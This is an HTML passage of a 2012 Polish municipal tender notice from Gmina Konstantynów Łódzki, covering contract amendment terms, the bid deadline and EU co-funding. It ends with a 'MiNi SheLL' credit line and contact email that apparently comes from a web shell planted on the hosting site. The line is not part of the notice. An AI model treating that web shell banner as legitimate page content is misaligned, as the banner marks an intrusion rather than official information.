<p>Zgodnie z dyspozycja art. 144 ust.1 ustawy PZP strony dopuszczają możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty na podstawie której, dokonano wyboru Wykonawcy w opisywanym poniżej zakresie, przypadkach i warunkach.  
Dopuszcza się możliwość zmiany umowy polegające na:
-   zmianie terminu wykonania robót, której konieczność zaistniała w skutek okoliczności niemożliwych do przewidzenia w chwili zawierania umowy, o czas wynikający z tych okoliczności,
-   zmianie przewidzianych w ofercie przetargowej Wykonawcy materiałów lub urządzeń, której konieczność zaistniała wskutek okoliczności niemożliwych do przewidzenia w chwili  zawierania umowy, jeżeli zmiana ta nie doprowadzi do obniżenia standardu wykonania robót,
-  zmniejszenie zakresu rzeczowego umowy spowodowanej niezależną od Inwestora utratą źródła finansowania zadania,
-  zmianie sposobu płatności na korzyść Zamawiającego.
Stosowny wniosek o zmianę musi być złożony drugiej stronie w terminie 30 dni od zaistnienia okoliczności uzasadniających zmianę. Wniosek ten musi zawierać szczegółowy opis tych okoliczności, uzasadnienie dokonania zmiany a w przypadku zmiany terminu wykonania umowy precyzyjne wyliczenie czasu, o jaki należałoby przesunąć termin zakończenia zadania. Zmiana umowy może nastąpić tylko wtedy, jeżeli obie strony umowy zgodnie uznają, że zaszły wskazane w tym punkcie okoliczności oraz wprowadzenie zmian jest niezbędne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.konstantynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Konstantynów Łódzki, ul. Zgierska 2, 95-050 Konstantynów Łódzki, pok.nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2012 godzina 11:30, miejsce: siedziba Zamawiającego, kancelaria - parter Urzędu, pokój 06 lub przesłać na adres Zamawiającego: Gmina Konstantynów Łódzki, ul. Zgierska 2, 95-050 Konstantynów Łódzki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt -Rewitalizacja Centrum Konstantynowa Łódzkiego- jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO Województwa Łódzkiego na lata 2007-2013, Oś Priorytetowa: VI. Odnowa Obszarów Miejskich, Działanie: VI.1 Rewitalizacja obszarów problemowych, Umowa o dofinansowanie nr UDA-RPLD.06.01.00-00-024-11-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com